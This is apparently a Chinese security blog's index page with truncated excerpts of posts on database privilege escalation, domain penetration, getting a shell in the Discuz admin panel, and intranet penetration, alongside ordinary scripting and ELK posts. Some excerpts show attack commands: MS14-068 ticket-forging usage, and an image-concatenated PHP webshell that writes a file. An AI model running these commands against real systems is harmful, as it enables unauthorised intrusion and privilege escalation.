百度链接批量提交脚本

需要用到花了几分钟写了一脚本,我加了个循环执行。省得去理了。就可以自动最新的东西提交给百度了。 # coding:utf-8 import time import requests from bs4 import BeautifulSoup '''从文...

常见数据库提权方式

应公司所需,给各位研发大哥使用,特此准备一份,同时来这里备个份。 常见数据库提权方式 一. MySQL提权 1.1 UDF提权 udf提权这是最常见的提权方式了,但是往往在执行过程中老是遇到"Can't open shared libr...

ELK stack收集nginx Log

为了简化所有的东西我都装在一台机器,其实其他的集群的话 1.设置静态ip ip a cd /etc/sysconfig/network-scripts/ vi ifcfg-ens160 BOOTPROTO=static PEERROUTES=yes IPADDR=192.168.1.138 GATEWAY=19...

业务安全测试的一些实例

近期做的一些业务安全方面的测试,其实毫无技术含量,就是想总结一下经常测试的点以及遇到的奇葩问题。 1.P2P常见逻辑漏洞(加车、下单、结算、支付等) 2.账号体系常见逻辑漏洞(注册、登录、撞...

域渗透那几个技巧

做个备份,最近用的比较多。 ms14068漏洞利用: 生成TGT: whoami /all python ms14068.py -u admin@xxx.com -p password -s sid -d dc.xxx.com ms14068.exe -u admin@xxx....

discuz后台拿shell姿势

昨晚遇到一个站点,好久不玩discuz都不会了。 做个笔记记录一下。 1.包含文件拿shell copy 1.jpg/b+1.txt/a 2.jpg 1.txt内容为: <?php fputs(fopen('f.php','w'),'<?p...

某一功能测试脚本

帮公司测试写的一个功能测试脚本。需要尽量少用第三方库,但其实还是用到了,连接ssh必须需要用到。 # coding:utf-8 import socket import sys import os import paramiko import subprocess...

记一次内网渗透

因为一客户的关系,需要搞定几个主站,收集一波信息下来,发现有waf,防火墙。略显棘手,找了一下子域,很偶然的机会挖到了一个任意文件上传,曲线救国路线开始,运气很好,在那几个主站在同一个网段。所以很顺...